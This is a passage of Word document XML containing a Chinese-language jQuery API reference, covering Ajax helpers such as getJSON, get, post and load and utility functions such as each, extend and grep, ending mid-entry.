        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>选项的默认值。传入的选项对象的类型与传入</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>的一样。如果后续的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求没有指定自己的值，则会使用这儿指定的值。这个函数没有返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.getJSON(url,[data],[f(object,status)]):XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步请求指定的</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>，同时添加任意指定的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>。接收到响应时，将它解析为</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>，然后将响应文本传入到回调函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>中。如果存在用于请求的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，则返回这个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuer</w:t>
      </w:r>
      <w:r>
        <w:t>y.getScript(url,[f(text,status)]):XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步请求指定的</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>。响应到达时，将它作为一个脚本执行，然后将响应文本传入</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。如果存在用于请求的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，则返回这个对象。允许跨域，但跨域时不会传入脚本文本给</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，也不会返回</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.get(url,[data],[f(data,status,xhr)],[type]):XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>生成一个到</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求，如果指</w:t>
      </w:r>
      <w:r>
        <w:t>明了</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>，则将它作为查询参数部分添加到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中。收到响应时，将它解释为指定</w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:t>，或者根据响应的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头指定的类型，必要时还会执行或解析它。最后，将（可能解析过的）响应数据连同</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>状态码、对应的用于请求的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象传入到回调函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>中。该</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象（如果存在的话）也是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.post(url,[data],[f(data,status,xhr)],[type]):XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>，但生成一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，而不是一个</w:t>
      </w:r>
      <w:r>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.param(o,[old=false]):string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:t>格式序列化</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性名和属性值，以便将它添加到一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中或作为一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求的正文。如果作为</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>参数传入一个对象，大多数</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>函数会自动完成这个转换。如果你想要</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.3</w:t>
      </w:r>
      <w:r>
        <w:t>风格的浅序列化，请把</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>作为第二个参数传入。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.parseJSON(text):obj</w:t>
      </w:r>
      <w:r>
        <w:t>ect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的文本并返回生成的对象。当请求</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>编码的数据时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>函数会隐式调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>load(url,[data],[f(text,status,xhr)])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步请求</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>，同时添加指定的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>。收到响应时，将它解释为一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，并将它插入到每个选中元素的位置，替换现存的内容。最后，将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为每个选中元素的方法调用，参数为响应文本、</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>状态码以及当前请求的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个空格，则该空格之后的文本将用做选择器，响应</w:t>
      </w:r>
      <w:r>
        <w:t>文档中只有匹配选择器的部分才会插入到选中元素中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>不同于大多数</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具，</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个方法，不是一个函数。类似于大多数</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它返回调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>serialize():string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>序列化选中表单及表单元素的名字与值，返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>www-form-urlencoded</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这些是杂项</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>函数和属性（不是方法）。更多细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.boxModel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.support.boxModel</w:t>
      </w:r>
      <w:r>
        <w:t>的一个弃用</w:t>
      </w:r>
      <w:r>
        <w:t>的同义词。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性指代一个标识浏览器厂商和版本的对象。在这个对象中，</w:t>
      </w:r>
      <w:r>
        <w:t>Internet Explorer</w:t>
      </w:r>
      <w:r>
        <w:t>具有属性</w:t>
      </w:r>
      <w:r>
        <w:t>msie</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>具有属性</w:t>
      </w:r>
      <w:r>
        <w:t>mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>具有属性</w:t>
      </w:r>
      <w:r>
        <w:t>webkit</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>具有属性</w:t>
      </w:r>
      <w:r>
        <w:t>opera</w:t>
      </w:r>
      <w:r>
        <w:t>。它的</w:t>
      </w:r>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:t>属性就是浏览器的版本号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.contains(a,b):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果文档元素</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>包含元素</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.data(elt):data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.data(elt,key):value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.data(elt,data)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.data(elt,key,value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>data()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的一个低级版本。如果传入一个元素参数，则返回该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果传入一个元素以及一个字符串，则从该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象中返回指定名字的值。如果传入一个元素以及一个对</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>象，则设置该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象。如果传入一个元素、一个字符串以及一个值，则设置该元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>对象中指定名字的值为传入的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.dequeue(elt,[qname="fx"])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>移除并调用指定元素指定名字的队列中的第一个函数。与</w:t>
      </w:r>
      <w:r>
        <w:t>$(elt).dequeue(qnqme)</w:t>
      </w:r>
      <w:r>
        <w:t>相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.each(o,f(name,value)):o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.each(a,f(index,value)):a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的每个属性调用一次</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，传入对应的属性名和属性值，并将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为属性值的方法调用。如果第一个参数是一个数组，或一个类数组元素，则将</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为数组中每个元素的方法调用，将数组的索引和元素值作为参数传入。如果</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>则迭代将停止。这个函数返回它的第一个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.error(m</w:t>
      </w:r>
      <w:r>
        <w:t>sg)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>抛出一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:t>的异常。可以在插件中调用这个函数，也可以在调试时重写（例如</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.error=alert</w:t>
      </w:r>
      <w:r>
        <w:t>）它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.extend(obj):object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.extend([deep=false],target,obj...):object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果传入一个参数，将</w:t>
      </w:r>
      <w:r>
        <w:t>obj</w:t>
      </w:r>
      <w:r>
        <w:t>的属性复制到全局的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>命名空间中。如果传入两个或更多参数，则按顺序复制第二个及之后的对象的属性到</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>对象中。如果可选参数</w:t>
      </w:r>
      <w:r>
        <w:t>deep</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则将执行深拷贝，属性将会递归复制。返回值为扩展的对象</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.globalEval(code):void</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>执行指定</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript code</w:t>
      </w:r>
      <w:r>
        <w:t>，就像它们是顶级＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞一样。没有返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.grep(a,f(elt,idx):boolean,[invert=false]):array</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个新数组，其中只包含</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中令</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。或者，如果</w:t>
      </w:r>
      <w:r>
        <w:t>invert</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>的话，则只返回令</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.inArray(v,a):integer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在数组或类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中寻找元素</w:t>
      </w:r>
      <w:r>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t>，如果找到则返回元素的索引，否则返</w:t>
      </w:r>
      <w:r>
        <w:t>回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.isArray(x):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>仅当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是一个真正的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组时返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery.isEmptyObject(x):boolean</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>仅当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
